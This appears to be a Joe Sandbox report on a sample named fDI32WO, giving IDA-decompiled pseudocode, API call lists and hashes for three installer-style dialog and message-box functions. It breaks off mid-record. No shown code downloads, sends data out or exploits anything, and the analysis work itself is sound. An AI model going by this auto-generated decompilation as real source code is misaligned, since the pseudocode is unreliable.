                                                                                                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                                                                                                              			E00A834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t35;
                                                                                                                                                                                                                                              				struct HWND__* _t38;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                                                                              					__eflags = 1;
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					 *0xa891d8 = 1;
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					_push(_a4);
                                                                                                                                                                                                                                              					L21:
                                                                                                                                                                                                                                              					EndDialog();
                                                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				_pop(1);
                                                                                                                                                                                                                                              				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                              				if(_t12 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                              					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L19;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t35 = _a4;
                                                                                                                                                                                                                                              					 *0xa88584 = _t35;
                                                                                                                                                                                                                                              					E00A843D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                              					__eflags =  *0xa88184; // 0x1
                                                                                                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                              					_t17 = CreateThread(0, 0, E00A84FE0, 0, 0, 0xa88798);
                                                                                                                                                                                                                                              					 *0xa8879c = _t17;
                                                                                                                                                                                                                                              					__eflags = _t17;
                                                                                                                                                                                                                                              					if(_t17 != 0) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						E00A844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t35);
                                                                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t23 = _t13 - 1;
                                                                                                                                                                                                                                              				if(_t23 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 2;
                                                                                                                                                                                                                                              					if(_a12 != 2) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					ResetEvent( *0xa8858c);
                                                                                                                                                                                                                                              					_t38 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              					_t25 = E00A844B9(_t38, 0x4b2, 0xa81140, 0, 0x20, 4);
                                                                                                                                                                                                                                              					__eflags = _t25 - 6;
                                                                                                                                                                                                                                              					if(_t25 == 6) {
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						 *0xa891d8 = 1;
                                                                                                                                                                                                                                              						SetEvent( *0xa8858c);
                                                                                                                                                                                                                                              						_t39 =  *0xa8879c; // 0x0
                                                                                                                                                                                                                                              						E00A83680(_t39);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t25 - 1;
                                                                                                                                                                                                                                              					if(_t25 == 1) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetEvent( *0xa8858c);
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                              					TerminateThread( *0xa8879c, 0);
                                                                                                                                                                                                                                              					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x00a83590
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83590
                                                                                                                                                                                                                                              0x00a83524
                                                                                                                                                                                                                                              0x00a83535
                                                                                                                                                                                                                                              0x00a83541
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83549
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000), ref: 00A83535
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00A83541
                                                                                                                                                                                                                                              • ResetEvent.KERNEL32 ref: 00A8355F
                                                                                                                                                                                                                                              • SetEvent.KERNEL32(00A81140,00000000,00000020,00000004), ref: 00A83590
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00A835C7
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 00A835F1
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 00A835F8
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 00A83610
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 00A83617
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00A83623
                                                                                                                                                                                                                                              • CreateThread.KERNEL32 ref: 00A83637
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00A83671
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                              • Opcode ID: 101173ce9f52f892a00eafc4eedf9cae084ab0b074bf6938b85ffe0e9a78a076
                                                                                                                                                                                                                                              • Instruction ID: a3332457d42cda8a5f1da406526578647cca80af7266d36a60481bb873ecd918
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 101173ce9f52f892a00eafc4eedf9cae084ab0b074bf6938b85ffe0e9a78a076
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC31B932240301BBEB20BFA9EC4DE2B3A75F795F11F544626F602952B0EF798912CB51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                                                                              			E00A84224(char __ecx) {
                                                                                                                                                                                                                                              				char* _v8;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				char* _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				char* _t61;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				char* _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				char _t67;
                                                                                                                                                                                                                                              				void* _t71;
                                                                                                                                                                                                                                              				char _t76;
                                                                                                                                                                                                                                              				intOrPtr _t85;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t67 = __ecx;
                                                                                                                                                                                                                                              				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                              				if(_t66 == 0) {
                                                                                                                                                                                                                                              					_t63 = 0x4c2;
                                                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                                                              					E00A844B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                              				_v12 = _t26;
                                                                                                                                                                                                                                              				if(_t26 == 0) {
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					FreeLibrary(_t66);
                                                                                                                                                                                                                                              					_t63 = 0x4c1;
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                              				_v20 = _t28;
                                                                                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                              				_v16 = _t29;
                                                                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t76 =  *0xa888c0; // 0x0
                                                                                                                                                                                                                                              				if(_t76 != 0) {
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					 *0xa887a0 = 0;
                                                                                                                                                                                                                                              					_v52 = _t67;
                                                                                                                                                                                                                                              					_v48 = 0;
                                                                                                                                                                                                                                              					_v44 = 0;
                                                                                                                                                                                                                                              					_v40 = 0xa88598;
                                                                                                                                                                                                                                              					_v36 = 1;
                                                                                                                                                                                                                                              					_v32 = E00A84200;
                                                                                                                                                                                                                                              					_v28 = 0xa888c0;
                                                                                                                                                                                                                                              					 *0xa8a288( &_v52);
                                                                                                                                                                                                                                              					_t32 =  *_v12();
                                                                                                                                                                                                                                              					if(_t71 != _t71) {
                                                                                                                                                                                                                                              						asm("int 0x29");
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_v12 = _t32;
                                                                                                                                                                                                                                              					if(_t32 != 0) {
                                                                                                                                                                                                                                              						 *0xa8a288(_t32, 0xa888c0);
                                                                                                                                                                                                                                              						 *_v16();
                                                                                                                                                                                                                                              						if(_t71 != _t71) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if( *0xa888c0 != 0) {
                                                                                                                                                                                                                                              							E00A81680(0xa887a0, 0x104, 0xa888c0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0xa8a288(_v12);
                                                                                                                                                                                                                                              						 *_v20();
                                                                                                                                                                                                                                              						if(_t71 != _t71) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					FreeLibrary(_t66);
                                                                                                                                                                                                                                              					_t85 =  *0xa887a0; // 0x0
                                                                                                                                                                                                                                              					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					GetTempPathA(0x104, 0xa888c0);
                                                                                                                                                                                                                                              					_t61 = 0xa888c0;
                                                                                                                                                                                                                                              					_t4 =  &(_t61[1]); // 0xa888c1
                                                                                                                                                                                                                                              					_t65 = _t4;
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t42 =  *_t61;
                                                                                                                                                                                                                                              						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                              					} while (_t42 != 0);
                                                                                                                                                                                                                                              					_t5 = _t61 - _t65 + 0xa888c0; // 0x1511181
                                                                                                                                                                                                                                              					_t44 = CharPrevA(0xa888c0, _t5);
                                                                                                                                                                                                                                              					_v8 = _t44;
                                                                                                                                                                                                                                              					if( *_t44 == 0x5c &&  *(CharPrevA(0xa888c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                              						 *_v8 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





























                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A84236
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A8424C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A84263
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A8427A
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,00A888C0,?,00000001), ref: 00A8429F
                                                                                                                                                                                                                                              • CharPrevA.USER32(00A888C0,01511181,?,00000001), ref: 00A842C2
                                                                                                                                                                                                                                              • CharPrevA.USER32(00A888C0,00000000,?,00000001), ref: 00A842D6
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A84391
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A843A5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                              • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                              • Opcode ID: 00532fd3f0903490c20aa49b9011959676cc7f9c32c179a402ca3ac9d31cf680
                                                                                                                                                                                                                                              • Instruction ID: 86e7f9d9e02216610145d660005d8a19d4f57e9cc4c680e5a98c24b7d331c2d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00532fd3f0903490c20aa49b9011959676cc7f9c32c179a402ca3ac9d31cf680
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49410474A00305AFE711FFB4DC88AAE7BB5EB49384F84456AE941A7291DF788C02C761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00A844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                                                                              				char _v576;
                                                                                                                                                                                                                                              				void* _v580;
                                                                                                                                                                                                                                              				struct HWND__* _v584;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t34;
                                                                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				signed int _t52;
                                                                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                                                                              				intOrPtr _t55;
                                                                                                                                                                                                                                              				intOrPtr _t58;
                                                                                                                                                                                                                                              				intOrPtr _t59;
                                                                                                                                                                                                                                              				int _t64;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                                                                                                              				intOrPtr* _t76;
                                                                                                                                                                                                                                              				intOrPtr* _t77;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				void* _t81;
                                                                                                                                                                                                                                              				void* _t82;
                                                                                                                                                                                                                                              				intOrPtr* _t84;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				signed int _t89;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t75 = __edx;
                                                                                                                                                                                                                                              				_t34 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                              				_v584 = __ecx;
                                                                                                                                                                                                                                              				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                              				_t67 = _a4;
                                                                                                                                                                                                                                              				_t69 = 0xd;
                                                                                                                                                                                                                                              				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                              				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                              				_v580 = _t37;
                                                                                                                                                                                                                                              				asm("movsb");
                                                                                                                                                                                                                                              				if(( *0xa88a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              					_t39 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_v576 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0xa89a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                              					if(_v576 != 0) {
                                                                                                                                                                                                                                              						_t73 =  &_v576;
                                                                                                                                                                                                                                              						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                              						_t75 = _t16;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t43 =  *_t73;
                                                                                                                                                                                                                                              							_t73 = _t73 + 1;
                                                                                                                                                                                                                                              						} while (_t43 != 0);
                                                                                                                                                                                                                                              						_t84 = _v580;
                                                                                                                                                                                                                                              						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                              						if(_t84 == 0) {
                                                                                                                                                                                                                                              							if(_t67 == 0) {
                                                                                                                                                                                                                                              								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                              								_t83 = _t27;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t75 = _t83;
                                                                                                                                                                                                                                              									_t74 = _t80;
                                                                                                                                                                                                                                              									E00A81680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t76 = _t67;
                                                                                                                                                                                                                                              								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                              								_t85 = _t24;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t55 =  *_t76;
                                                                                                                                                                                                                                              									_t76 = _t76 + 1;
                                                                                                                                                                                                                                              								} while (_t55 != 0);
                                                                                                                                                                                                                                              								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                              								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00A8171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t77 = _t67;
                                                                                                                                                                                                                                              							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                              							_t81 = _t18;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t58 =  *_t77;
                                                                                                                                                                                                                                              								_t77 = _t77 + 1;
                                                                                                                                                                                                                                              							} while (_t58 != 0);
                                                                                                                                                                                                                                              							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                              							_t82 = _t84 + 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t59 =  *_t84;
                                                                                                                                                                                                                                              								_t84 = _t84 + 1;
                                                                                                                                                                                                                                              							} while (_t59 != 0);
                                                                                                                                                                                                                                              							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                              							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                              							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                              							_t80 = _t44;
                                                                                                                                                                                                                                              							if(_t80 == 0) {
                                                                                                                                                                                                                                              								goto L6;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_push(_v580);
                                                                                                                                                                                                                                              								E00A8171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                              								L23:
                                                                                                                                                                                                                                              								MessageBeep(_a12);
                                                                                                                                                                                                                                              								if(E00A8681F(_t67) == 0) {
                                                                                                                                                                                                                                              									L25:
                                                                                                                                                                                                                                              									_t49 = 0x10000;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t54 = E00A867C9(_t74, _t74);
                                                                                                                                                                                                                                              									_t49 = 0x190000;
                                                                                                                                                                                                                                              									if(_t54 == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                                                                                                                                                                                              								_t83 = _t52;
                                                                                                                                                                                                                                              								LocalFree(_t80);
                                                                                                                                                                                                                                              								_t39 = _t52;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(E00A8681F(_t67) == 0) {
                                                                                                                                                                                                                                              							L4:
                                                                                                                                                                                                                                              							_t64 = 0x10010;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t66 = E00A867C9(0, 0);
                                                                                                                                                                                                                                              							_t64 = 0x190010;
                                                                                                                                                                                                                                              							if(_t66 == 0) {
                                                                                                                                                                                                                                              								goto L4;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                              						L6:
                                                                                                                                                                                                                                              						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                              			}



































                                                                                                                                                                                                                                              0x00a8463d
                                                                                                                                                                                                                                              0x00a8464e
                                                                                                                                                                                                                                              0x00a8464e
                                                                                                                                                                                                                                              0x00a8463f
                                                                                                                                                                                                                                              0x00a84640
                                                                                                                                                                                                                                              0x00a84647
                                                                                                                                                                                                                                              0x00a8464c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8464c
                                                                                                                                                                                                                                              0x00a84666
                                                                                                                                                                                                                                              0x00a8466d
                                                                                                                                                                                                                                              0x00a8466f
                                                                                                                                                                                                                                              0x00a84675
                                                                                                                                                                                                                                              0x00a84675
                                                                                                                                                                                                                                              0x00a845ad
                                                                                                                                                                                                                                              0x00a84527
                                                                                                                                                                                                                                              0x00a8452e
                                                                                                                                                                                                                                              0x00a8453f
                                                                                                                                                                                                                                              0x00a8453f
                                                                                                                                                                                                                                              0x00a84530
                                                                                                                                                                                                                                              0x00a84531
                                                                                                                                                                                                                                              0x00a84538
                                                                                                                                                                                                                                              0x00a8453d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8453d
                                                                                                                                                                                                                                              0x00a84554
                                                                                                                                                                                                                                              0x00a8455a
                                                                                                                                                                                                                                              0x00a8455a
                                                                                                                                                                                                                                              0x00a8455a
                                                                                                                                                                                                                                              0x00a84525
                                                                                                                                                                                                                                              0x00a8468c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                              • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A845A3
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A845E3
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A8460D
                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 00A84630
                                                                                                                                                                                                                                              • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00A84666
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00A8466F
                                                                                                                                                                                                                                                • Part of subcall function 00A8681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A8686E
                                                                                                                                                                                                                                                • Part of subcall function 00A8681F: GetSystemMetrics.USER32(0000004A), ref: 00A868A7
                                                                                                                                                                                                                                                • Part of subcall function 00A8681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A868CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8681F: RegQueryValueExA.ADVAPI32(?,00A81140,00000000,?,?,0000000C), ref: 00A868F4
                                                                                                                                                                                                                                                • Part of subcall function 00A8681F: RegCloseKey.ADVAPI32(?), ref: 00A86902
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                              • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                              • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                              • Opcode ID: fd0d461c7b1677b9ffc8c077a038731a0c970258cfe0dba0aaf7b67eec2b27a3
                                                                                                                                                                                                                                              • Instruction ID: 9532de633f5915d64278f21a54963c6951fb98305345ca3b6e2b3dead545c3ad
